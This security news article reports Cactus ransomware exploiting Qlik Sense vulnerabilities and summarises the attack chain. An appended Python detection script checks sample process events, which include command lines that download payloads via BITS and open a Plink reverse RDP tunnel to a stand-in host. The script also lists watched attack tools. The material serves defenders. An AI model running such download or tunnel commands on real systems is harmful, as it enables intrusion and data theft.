Attack

Ransomware is exploiting Qlik Sense BI platform bugs to breach networks

Take action: If you are using Qlik Sense Enterprise for Windows, IMMEDIATELY lock it down within your internal network, then start patching as soon as possible.


The Cactus ransomware group has been exploiting critical vulnerabilities in Qlik Sense, a data analytics and business intelligence (BI) platform, to infiltrate corporate networks. Two major security flaws in the Windows version of Qlik Sense were disclosed at the end of August.

The first, a path traversal bug (CVE-2023-41266), allows the creation of anonymous sessions and unauthorized HTTP requests. The second, more severe issue (CVE-2023-41265) enables privilege escalation and execution of HTTP requests against the backend server, without requiring authentication. Qlik later determined that the initial fix for CVE-2023-41265 was inadequate, which led to a revised update and the identification of a new vulnerability (CVE-2023-48365).

Cactus ransomware is actively exploiting these vulnerabilities in unpatched, publicly exposed Qlik Sense instances.

The attack chain uses PowerShell and BITS to download tools for persistence and remote access, including disguised ManageEngine UEMS executables, AnyDesk, and a renamed Plink binary. The attackers also run discovery commands, disable antivirus software, change administrator passwords, and establish RDP tunnels for concealment and data gathering.

In the attack's final phase, the Cactus ransomware itself is deployed. The use of RDP for lateral movement, WizTree for disk-space analysis, and a disguised rclone binary for data exfiltration matches the pattern seen in previous Cactus ransomware attacks.
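As an added illustration (not code from the article, from Qlik, or from any vendor), a small Python triage script that checks three observable stages of the chain described above against constructed Sysmon-style process-creation events: a shell or BITS client spawned directly by the Qlik Sense service tree, a BITS download from a remote URL, and a dropped tool whose PE version resource still names Plink or rclone despite a renamed file. The Qlik process names, the placeholder hosts and every event are assumptions made for the example, not details from the article.

```python
import json
import ntpath

# Constructed Sysmon-style (Event ID 1) process-creation events, one JSON object per line.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Qlik\\Sense\\Engine\\Engine.exe", "CommandLine": "powershell -NoP -c Start-BitsTransfer -Source http://placeholder.invalid/a.bin -Destination C:\\ProgramData\\svc.exe", "OriginalFileName": "PowerShell.EXE"}
{"Image": "C:\\Windows\\System32\\bitsadmin.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "bitsadmin /transfer j /download http://placeholder.invalid/b.exe C:\\ProgramData\\up.exe", "OriginalFileName": "bitsadmin.exe"}
{"Image": "C:\\ProgramData\\svc.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "svc.exe -R 3389:127.0.0.1:3389 placeholder.invalid", "OriginalFileName": "Plink"}
{"Image": "C:\\Program Files\\PuTTY\\plink.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "plink.exe -V", "OriginalFileName": "Plink"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe", "OriginalFileName": "NOTEPAD.EXE"}
"""

# Qlik Sense service binaries (assumed default install names; adjust to your deployment).
QLIK_PARENTS = ("engine.exe", "proxy.exe", "scheduler.exe")
# Built-in Windows binaries the article reports in the tool-download stage.
LOLBINS = ("powershell.exe", "pwsh.exe", "bitsadmin.exe", "cmd.exe")
# Tools the article says were dropped under disguised or renamed file names.
WATCHED_TOOLS = ("plink", "rclone", "anydesk")

def check_event(ev):
    """Return the rule names one event trips; an empty list means nothing matched."""
    image = ntpath.basename(ev.get("Image", "")).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    original = ev.get("OriginalFileName", "").lower()
    cmdline = ev.get("CommandLine", "").lower()
    hits = []
    # 1. Shell or BITS client started directly by the Qlik Sense service tree.
    if parent in QLIK_PARENTS and image in LOLBINS:
        hits.append("qlik_spawns_lolbin")
    # 2. BITS fetch of a remote URL, via the PowerShell cmdlet or the bitsadmin client.
    uses_bits = "start-bitstransfer" in cmdline or "bitsadmin" in cmdline
    if image in LOLBINS and uses_bits and "http" in cmdline:
        hits.append("bits_remote_download")
    # 3. Renamed tool: the PE version resource still carries the real product name.
    stem = original.rsplit(".", 1)[0]
    if stem and stem != image.rsplit(".", 1)[0] and any(t in stem for t in WATCHED_TOOLS):
        hits.append("renamed_tool:" + stem)
    return hits

def scan(jsonl):
    """Parse newline-delimited JSON events; return (image basename, rule) findings in order."""
    findings = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        for rule in check_event(ev):
            findings.append((ntpath.basename(ev["Image"]), rule))
    return findings
```

Rule 3 deliberately does not fire on a legitimately named plink.exe, so it isolates the renaming the article describes rather than the presence of the tool.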
